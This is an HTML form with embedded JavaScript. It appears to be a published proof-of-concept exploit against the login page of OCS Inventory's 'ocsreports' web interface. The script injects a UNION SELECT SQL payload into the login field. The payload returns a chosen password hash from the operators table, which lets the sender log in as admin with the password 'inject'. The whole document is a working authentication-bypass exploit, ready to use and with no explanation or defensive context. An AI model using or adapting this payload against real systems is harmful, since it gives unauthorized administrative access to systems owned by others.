<script>
  function inject()
  {
    document.getElementById('log').action =
document.getElementById('ocsreports').value + 'index.php';
    sql = "0' UNION SELECT id, accesslvl,
'a181b4673216ad247a0f78066a9646e1' FROM operators WHERE id='"
    document.getElementById('login').value = sql +
document.getElementById('user').value;
    document.getElementById('pass').value = "inject";
  }
</script>
<form name="log" id="log" action="" method="post">
  <table border="0" width="450px">
  <tr>
    <td><b>OCSReports :</b></td>
    <td><input type="text" id="ocsreports" size="40"
value="http://www.example.com/ocsreports/" /></td>
  </tr>
  <tr>
    <td><b>Login :</b></td>
    <td><input type="text" id="user" size="40" value="admin" /></td>
  </tr>
  <tr>
    <td><input type="hidden" name="login" id="login" />
        <input type="hidden" name="pass"  id="pass"  /></td>
    <td><input type="submit" name="subLogin" onclick="inject();"></td>
  </tr>
  </table>
</form>